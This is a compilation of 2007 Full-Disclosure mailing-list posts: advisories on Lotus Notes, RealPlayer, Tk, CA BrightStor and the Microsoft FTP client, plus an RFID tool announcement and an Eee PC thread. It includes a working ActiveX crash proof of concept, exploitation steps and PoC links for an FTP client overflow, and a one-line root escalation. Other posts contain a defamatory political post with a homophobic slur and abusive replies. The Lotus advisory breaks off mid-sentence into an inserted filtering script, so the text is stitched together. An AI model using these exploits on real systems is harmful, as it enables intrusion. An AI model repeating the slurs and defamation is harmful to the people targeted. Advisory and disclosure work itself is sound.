[Full-disclosure] Announce: RFIDIOt release RFIDIOt-0.1r, November 2007
Folks,

I'm pleased to bring you the latest update to RFIDIOt, the open source python library for RFID exploration...

This release is brought to you courtesy of United Airlines, who bumped me from my flight thereby condemning me to 8 hours in the largest, shiniest, emptiest and most soul-destroying lounge I've ever had the misfortune to set foot in... If ever there was motivation to lose yourself in python, this was it... :)

From CHANGES:

v0.r

  add SCM Microsystems reader support
  add -d (debug) option
  switch to T=1 protocol for PC/SC
  add auto-detect of PC/SC reader types
  fix minor reporting issues in readmifaresimple.py
  fix setting of tag type 'ALL' on ACG readers (different for LF or HF)
  added a bunch of PCSC ATR card types
  add reading of previously stored files to mrpkey.py
  fix CBEFF processing in mrpkey.py
  fix bruteforcing of first character in mrpkey.py [Petter Bjorklund]
  add ID Card processing to mrpkey.py [vonJeek [EMAIL PROTECTED]]

The main change is processing the Biometric block in e-passports, which should now work correctly for all nations, and adding ID cards (thanks to vonJeek)... Please let me know if you find any exceptions. ID cards have so far only been tested on NL cards.

Full details here:

  http://rfidiot.org

enjoy,
Adam

-- 
Adam Laurie                         Tel: +44 (0) 1304 814800
The Bunker Secure Hosting Ltd.      Fax: +44 (0) 1304 814899
Ash Radar Station
Marshborough Road
Sandwich                            [EMAIL PROTECTED]
Kent
CT13 0PL
UNITED KINGDOM

PGP key on keyservers

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Trent Lott
Chester Trent Lott Sr. is was a crappy Senator from Mississippi and a member of the Republican Party. He has served in numerous leadership positions, and is best known for gay sex with male prostitutes. On November 26 2007, Lott announced his intent to resign from his Senate seat by the end of 2007, in order to pursue something else in the private sector or to teach. The truth was he left because he was about to be exposed for being a complete faggot IRL [1] Some male whore named Benjamin Nicholas alleged to have been involved with is the married Sen. Trent Lott, who unexpectedly announced his retirement. Lott is well-known to have been against a plethora of gay rights issues throughout his terms in Congress. He was also good friends with Sen. Larry Craig throughout his time in Congress. Nicholas didnt want to go on the record to talk about his dealings with Lott, because, said Nicholas, Trent is going through his fair share of scrutiny right now and I dont want to add to it. However, e-mail and other records confirm that the two have met on at least two occasions. All I can say at this point is no comment, Nicholas. Its the professional thing for me to do. In a subsequent e-mail message, Nicholas confirmed that another publication is working on a story about a possible relationship between Lott and himself, but Nicholas also politely declined an interview for that story. As I said before, Lott has quite a bit on his plate right now and I dont really want to add fuel to the embers, Nicholas explained. HUSTLER MAGAZINE EDiot RESEARCH Hustler publisher Larry Flint posted the following cryptic message on his website:Hustler magazine has received numerous inquiries regarding the involvement of Larry Flynt and Hustler in the resignation of Trent Lott. Senator Lott has been the target of an ongoing Hustler investigation for some time now, due to confidential information that we have received. http://www.encyclopediadramatica.com/Trent_Lott - Be a better pen pal. 
[Full-disclosure] CORE-2007-0821: Lotus Notes buffer overflow in the Lotus WorkSheet file processor
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs

Lotus Notes buffer overflow in the Lotus WorkSheet file processor

*Advisory Information*

Title: Lotus Notes buffer overflow in the Lotus WorkSheet file processor
Advisory ID: CORE-2007-0821
Advisory URL: http://www.coresecurity.com/index.php5?action=itemid=2008
Date published: 2007-11-27
Date of last update: 2007-11-27
Vendors contacted: IBM Corp.
Release mode: COORDINATED RELEASE

*Vulnerability Information*

Class: Input validation error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: N/A
CVE Name: N/A

*Vulnerability Description*

Lotus Notes is the integrated email, calendar, instant messenger, browser and business collaboration application developed by IBM to work as a desktop client in conjunction with IBM's Lotus Domino server application. The email functionality of Lotus Notes supports previewing and processing file attachments in various formats. To preview and process files in the Lotus Worksheet File format (WKS) used by Lotus 1-2-3, the email client uses a library from a third-party software vendor (Autonomy's Verity KeyView SDK).

Several buffer overflow vulnerabilities were found in the third-party library used by Lotus Notes to process Lotus 1-2-3 file attachments. These vulnerabilities could allow attackers to remotely execute arbitrary commands on vulnerable systems by attaching a specially crafted file that triggers exploitation when unsuspecting users attempt to "View" the attachment. Exploitation of these vulnerabilities requires user intervention.

Although these specific vulnerabilities exist in a third-party component, the problem is compounded by the way Lotus Notes displays information about attachments, making it easier to elicit unsuspecting assistance from users in exploiting them.

Lotus Notes displays the file type and corresponding icon based on the attached file's extension rather than the MIME Content-Type header in the email, whereas the view functionality is handled by the Verity KeyView component, which processes the attachment based on the file contents. Exploitation of these vulnerabilities requires end-user interaction, but the discrepancy described above could allow an attacker to send a malicious Lotus 1-2-3 file as an attachment with a seemingly innocuous extension (for example, .JPG or .GIF) that more easily lures users into viewing it, thus making it easier to succeed in the exploitation attempt.

These vulnerabilities have been discovered and tested using Lotus Notes and the Verity KeyView SDK components it uses, but other applications that use the Verity KeyView SDK may also be vulnerable.

*Vulnerable packages*

- Lotus Notes version 7.x
- Lotus Notes version 8.x (not confirmed by Core)
- Lotus Notes version 6.5.6 (not confirmed by Core)
- Other software packages using Verity KeyView SDK using vulnerable versions of l123sr.dll

*Non-vulnerable packages*

N/A

*Solution/Vendor Information/Workaround*

Lotus Notes customers should follow the instructions of the following support Technote, which outlines the available options based on specific versions of Lotus Notes:

http://www.ibm.com/support/docview.wss?rs=475uid=swg21285600

Workaround 1: Delete the keyview.ini file in the Notes program directory. This disables ALL viewers. When a user clicks View (for any file), a dialog box will display with the message "Unable to locate the viewer configuration file."

Workaround 2: Delete the problem file l123sr.dll. When a user tries to view the specific file type, a dialog box will display with the message "The viewer display window could not be initialized." All other file types work without returning the error message.

Workaround 3: Comment out specific lines in keyview.ini for any references to the problem file (l123sr.dll). To comment a line, precede it with a semi-colon (;). When a user tries to view the specific file type, a dialog box will display with the message "The viewer display window could not be initialized." For example:

[KVWKBVE]
;81.2.0.5.0=l123sr.dll
;81.2.0.9.0=l123sr.dll

Workaround 4: Filter inbound emails with attachments with potentially malicious files. Lotus 1-2-3 files are usually associated with MIME Content-Type headers set to the following strings:

application/lotus-1-2-3
application/lotus123
application/x-lotus123
application/wks
application/x-wks
application/vnd.lotus-1-2-3

Note however that workaround #4 is simply a stop-gap measure that could be circumvented by relatively unsophisticated attackers.

*Credits*

This vulnerability was discovered by Sebastián Muñiz from the CORE IMPACT Exploit Writers Team (EWT).

*Technical Description*

Lotus 1-2-3 and Lotus Symphony spreadsheet applications use the Worksheet File format [1] to persist spreadsheet data on the file system. Lotus Notes uses a third-party library [2] to process file attachments in the Lotus Worksheet
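As an added illustration of the extension/content discrepancy the advisory describes and of workaround 4 (example code written for this page, not code from Core or IBM): a mail-gateway check in Python that flags an attachment when its declared Content-Type is one of the Lotus types listed above, or when its bytes start with a Lotus worksheet BOF record while the filename carries a non-Lotus extension such as .jpg. The Lotus BOF signature (record type 0x0000, length 0x0002, version word 0x0404 or 0x0406), the extension set and the sample message are assumptions constructed for the example.

```python
import email
import os
from email import policy
from email.message import EmailMessage

# MIME types the advisory lists as usually associated with Lotus 1-2-3 files.
LOTUS_MIME_TYPES = {
    "application/lotus-1-2-3",
    "application/lotus123",
    "application/x-lotus123",
    "application/wks",
    "application/x-wks",
    "application/vnd.lotus-1-2-3",
}

# Extensions under which a Lotus worksheet would legitimately arrive
# (assumption: the advisory names the format, not its extensions).
LOTUS_EXTENSIONS = {".wks", ".wk1", ".wk3", ".wk4", ".123"}

# Assumed Lotus worksheet signature: a BOF record (type 0x0000, length 0x0002)
# followed by a little-endian version word, 0x0404 for 1-2-3 release 1A (WKS)
# and 0x0406 for release 2 (WK1). The Notes viewer keys off content rather
# than extension, so a gateway filter has to look at content as well.
LOTUS_BOF_HEADER = b"\x00\x00\x02\x00"
LOTUS_BOF_VERSIONS = {b"\x04\x04", b"\x06\x04"}


def looks_like_lotus_worksheet(data: bytes) -> bool:
    """True if the leading bytes match the assumed Lotus worksheet BOF record."""
    return data[:4] == LOTUS_BOF_HEADER and data[4:6] in LOTUS_BOF_VERSIONS


def classify_attachment(part) -> list:
    """Return the reasons a MIME part should be held back; empty if none."""
    reasons = []
    declared = part.get_content_type()
    filename = part.get_filename() or ""
    ext = os.path.splitext(filename)[1].lower()
    payload = part.get_payload(decode=True) or b""

    # Workaround 4 from the advisory: the declared type says Lotus 1-2-3.
    if declared in LOTUS_MIME_TYPES:
        reasons.append("declared Content-Type %s is a Lotus 1-2-3 type" % declared)

    # The discrepancy the advisory describes: the bytes are a worksheet, but the
    # extension (which drives the icon Notes shows) or the declared type is not.
    if looks_like_lotus_worksheet(payload):
        if ext not in LOTUS_EXTENSIONS:
            reasons.append("Lotus worksheet content behind extension %r" % (ext or "(none)"))
        elif declared not in LOTUS_MIME_TYPES:
            reasons.append("Lotus worksheet content declared as %s" % declared)
    return reasons


def scan_message(raw: bytes) -> dict:
    """Map attachment filename -> reasons, for every attachment that is flagged."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = {}
    for part in msg.iter_attachments():
        reasons = classify_attachment(part)
        if reasons:
            findings[part.get_filename() or "(unnamed)"] = reasons
    return findings


def build_sample_message() -> bytes:
    """Constructed sample mail: a disguised worksheet, a real JPEG, an honest WK1."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Q3 figures"
    msg.set_content("Figures attached, please review.")
    worksheet = LOTUS_BOF_HEADER + b"\x04\x04" + b"\x00" * 32  # fake WKS body
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 32                  # JPEG SOI marker
    # Worksheet bytes labelled as an image: what Notes would show as a picture.
    msg.add_attachment(worksheet, maintype="image", subtype="jpeg", filename="figures.jpg")
    msg.add_attachment(jpeg, maintype="image", subtype="jpeg", filename="photo.jpg")
    msg.add_attachment(LOTUS_BOF_HEADER + b"\x06\x04" + b"\x00" * 32,
                       maintype="application", subtype="x-lotus123", filename="budget.wk1")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, why in scan_message(build_sample_message()).items():
        print(name, "->", "; ".join(why))
```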
Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
Ouch is right.. I know I confused a lot of people, I apologize for that. Anyhow, SecurityFocus moved the PlayerProperty() issue from 22811 to its own BID, http://www.securityfocus.com/bid/26586. I have been in contact with Symantec's DeepSight team, and it looks like the Import() function will still throw a stack overflow exception, however it does not appear to overwrite the EIP, making it a plain old DoS attack. I believe they plan to post a write-up on this.

Elazar

-----Original Message-----
From: James Matthews <[EMAIL PROTECTED]>
Sent: Nov 26, 2007 7:24 PM
To: Elazar Broad <[EMAIL PROTECTED]>
Cc: "full-disclosure@lists.grok.org.uk"
Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

> Ouch!
>
> On Nov 26, 2007 9:15 PM, Elazar Broad [EMAIL PROTECTED] wrote:
>
>> After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really http://www.securityfocus.com/bid/26130 , although I am not sure why Linux is listed under the "Vulnerable" section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer (which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID.
>>
>> PoC as follows:
>>
>> <!-- written by e.b. -->
>> <html>
>> <head>
>> <script language="JavaScript" DEFER>
>> function Check() {
>>   var s = "";
>>   while (s.length < 99) s = s + s;
>>   var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
>>   var obj2 = obj.PlayerProperty(s);
>> }
>> </script>
>> </head>
>> <body onload="JavaScript: return Check();">
>> </body>
>> </html>
>>
>> Elazar
Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
Holy mother of Hitler will you shut the fuck up already. This is a stack overflow not a stack based buffer overflow. There are no security implications here. You are worse than Jewha Mati Laurio. Elazar, please do not post to this list again. Please leave the trolling to the professionals.

J

P.S. Sorry for the swear words John.

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad [EMAIL PROTECTED] wrote:

> After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really http://www.securityfocus.com/bid/26130, although I am not sure why Linux is listed under the Vulnerable section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer (which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID.
>
> PoC as follows:
>
> <!-- written by e.b. -->
> <html>
> <head>
> <script language="JavaScript" DEFER>
> function Check() {
>   var s = "";
>   while (s.length < 99) s = s + s;
>   var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
>   var obj2 = obj.PlayerProperty(s);
> }
> </script>
> </head>
> <body onload="JavaScript: return Check();">
> </body>
> </html>
>
> Elazar
Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
LOLOLOLOL ok you win, client side denial of service warrants your 5 electronic mail messages with up to the minute updates. I bet this one will be exploited in the wild! Get a life LOLOL!

J

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad [EMAIL PROTECTED] wrote:

> Stack Overflow - learn to read. A DoS attack still has some security implications...
>
> -----Original Message-----
> From: Joey Mengele [EMAIL PROTECTED]
> Sent: Nov 27, 2007 1:05 AM
> To: full-disclosure@lists.grok.org.uk, [EMAIL PROTECTED]
> Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
>
>> Holy mother of Hitler will you shut the fuck up already. This is a stack overflow not a stack based buffer overflow. There are no security implications here. You are worse than Jewha Mati Laurio. Elazar, please do not post to this list again. Please leave the trolling to the professionals.
>>
>> J
>>
>> P.S. Sorry for the swear words John.
Re: [Full-disclosure] Eee PC Security
Danny wrote:
> Has anyone had a go with/against the Asus Eee PC?

Yes. Open the file browser and get a terminal (/usr/bin/konsole will do). Then just 'sudo su -' and you're root! Every user gets ALL=(ALL) NOPASSWD: ALL in sudoers, so not much of a challenge.

Haven't tried any remote exploits, but it was running a (probably customised) 2.6.16 kernel (iirc) so is vulnerable to a couple of things off the top of my head.

Matt
[Full-disclosure] [SECURITY] [DSA 1416-1] New tk8.3 packages fix arbitrary code execution
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1416-1                  [EMAIL PROTECTED]
http://www.debian.org/security/                      Moritz Muehlenhoff
November 27, 2007                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : tk8.3
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-5378

It was discovered that Tk, a cross-platform graphical toolkit for Tcl, performs insufficient input validation in the code used to load GIF images, which may lead to the execution of arbitrary code.

For the stable distribution (etch), this problem has been fixed in version 8.3.5-6etch1.

Due to a technical limitation in the Debian archive scripts, the update for the old stable distribution (sarge) cannot be released in sync with the update for the stable distribution. It will be provided in the next days.

We recommend that you upgrade your tk8.3 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
[Full-disclosure] [SECURITY] [DSA 1415-1] New tk8.4 packages fix arbitrary code execution
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1415-1                  [EMAIL PROTECTED]
http://www.debian.org/security/                      Moritz Muehlenhoff
November 27, 2007                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : tk8.4
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-5378

It was discovered that Tk, a cross-platform graphical toolkit for Tcl, performs insufficient input validation in the code used to load GIF images, which may lead to the execution of arbitrary code.

For the stable distribution (etch), this problem has been fixed in version 8.4.12-1etch1.

For the old stable distribution (sarge), this problem has been fixed in version 8.4.9-1sarge1.

We recommend that you upgrade your tk8.4 packages. Updated packages for sparc will be provided later.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian 3.1 (oldstable)
- ----------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.
Re: [Full-disclosure] Eee PC Security
> Has anyone had a go with/against the Asus Eee PC?

SANS did a write-up on this the other day:

  http://isc.sans.org/diary.html?storyid=3687

.. and they include the steps required to disable the offending services.

~Mike.
[Full-disclosure] Security Contact @ Avast!
Hi

Could anyone send me the security contact of avast! ? [EMAIL PROTECTED] does not respond.

Thanks

-- 
Sowhat
http://secway.org

Life is like a bug, Do you know how to exploit it ?
Re: [Full-disclosure] ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Expos
It is so amazing that the vendor's advisory was released more than one month ago (see my advisory of a similar vul at http://ruder.cdut.net/blogview.asp?logID=221), and another thing is that I have tested my reported vul again after CA's patch was released one month ago, but in fact they have not fixed it!! I reported it again to CA but there is no response. I guess CA is making an international joke with us :), or is it because this product is so bad that they will not support it any more?

Welcome to my blog: http://ruder.cdut.net

> From: [EMAIL PROTECTED]
> To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
> Date: Mon, 26 Nov 2007 16:10:30 -0600
> Subject: [Full-disclosure] ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Exposure Vulnerability
>
> ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Exposure Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-07-069.html
> November 26, 2007
>
> -- CVE ID:
> CVE-2007-5328
>
> -- Affected Vendor:
> Computer Associates
>
> -- Affected Products:
> BrightStor ARCserve Backup r11.5
> BrightStor ARCserve Backup r11.1
> BrightStor ARCserve Backup r11.0
> BrightStor Enterprise Backup r10.5
> BrightStor ARCserve Backup v9.01
>
> -- TippingPoint(TM) IPS Customer Protection:
> TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5144. For further product information on the TippingPoint IPS:
>
>     http://www.tippingpoint.com
>
> -- Vulnerability Details:
> This vulnerability allows attackers to arbitrarily access and modify the file system and registry of vulnerable installations of Computer Associates BrightStor ARCserve Backup. Authentication is not required to exploit this vulnerability.
>
> The specific flaws exist in the Message Engine RPC service which listens by default on TCP port 6504 with the following UUID:
>
>     506b1890-14c8-11d1-bbc3-00805fa6962e
>
> The service exposes a number of insecure method calls including: 0x17F, 0x180, 0x181, 0x182, 0x183, 0x184, 0x185, 0x186, 0x187, 0x188, 0x189, 0x18A, 0x18B, and 0x18C. Attackers can leverage these methods to manipulate both the file system and registry which can result in a complete system compromise.
>
> -- Vendor Response:
> Computer Associates has issued an update to correct this vulnerability. More details can be found at:
>
>     http://supportconnectw.ca.com/public/storage/infodocs/basb-secnotice.asp
>
> -- Disclosure Timeline:
> 2007.01.12 - Vulnerability reported to vendor
> 2007.11.26 - Coordinated public release of advisory
>
> -- Credit:
> This vulnerability was discovered by Tenable Network Security.
>
> -- About the Zero Day Initiative (ZDI):
> Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
>
> Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
>
>     http://www.zerodayinitiative.com
>
> The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
[Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
Microsoft FTP Client Multiple Bufferoverflow Vulnerability

#####################################################
XDisclose Advisory       : XD100096
Vulnerability Discovered : November 20th 2007
Advisory Reported        : November 28th 2007
Credit                   : Rajesh Sethumadhavan
Class                    : Buffer Overflow
                           Denial Of Service
Solution Status          : Unpatched
Vendor                   : Microsoft Corporation
Affected applications    : Microsoft FTP Client
Affected Platform        : Windows 2000 Server
                           Windows 2000 Professional
                           Windows XP
                           (Other versions may also be affected)
#####################################################

Overview:

A buffer overflow vulnerability has been discovered in the Microsoft FTP client. Attackers can crash the FTP client of the victim user by tricking the user.

Description:

A remote attacker can craft a packet with a payload in the mget, ls, dir, username and password commands as demonstrated below. When the victim executes the PoC or specially crafted packets, the FTP client will crash, with possible arbitrary code execution in the context of the logged-in user. This vulnerability is hard to exploit since it requires social engineering and the shellcode has to be injected as an argument to the vulnerable commands.

The vulnerability is caused by an error in the Windows FTP client in validating commands like mget, dir, user, password and ls.

Exploitation method:

Method 1:
- Send the PoC with payload to the user.
- Social engineer the victim into opening it.

Method 2:
- The attacker creates a directory with a long folder or file name on his FTP server (should be other than an IIS server).
- Persuade the victim to run the command mget, ls or dir on the specially crafted folder using the Microsoft FTP client.
- The FTP client will crash and the payload will get executed.

Proof Of Concept:

http://www.xdisclose.com/poc/mget.bat.txt
http://www.xdisclose.com/poc/username.bat.txt
http://www.xdisclose.com/poc/directory.bat.txt
http://www.xdisclose.com/poc/list.bat.txt

Note: Modify the PoC to connect to a lab FTP server (as of now it will connect to ftp://xdisclose.com).

Demonstration:

Note: The demonstration leads to crashing of the Microsoft FTP client.

Download the PoC, rename it to a .bat file and execute any one of the batch files:

http://www.xdisclose.com/poc/mget.bat.txt
http://www.xdisclose.com/poc/username.bat.txt
http://www.xdisclose.com/poc/directory.bat.txt
http://www.xdisclose.com/poc/list.bat.txt

Solution:

No Solution

Screenshot:

http://www.xdisclose.com/images/msftpbof.jpg

Impact:

Successful exploitation may allow execution of arbitrary code with the privileges of the currently logged-in user. Impact of the vulnerability is system level.

Original Advisory:

http://www.xdisclose.com/advisory/XD100096.html

Credits:

Rajesh Sethumadhavan has been credited with the discovery of this vulnerability.

Disclaimer:

This entire document is strictly for educational, testing and demonstrating purpose only. Modification, use and/or publishing of this information is entirely at your own risk. The exploit code/Proof Of Concept is to be used in a test environment only. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.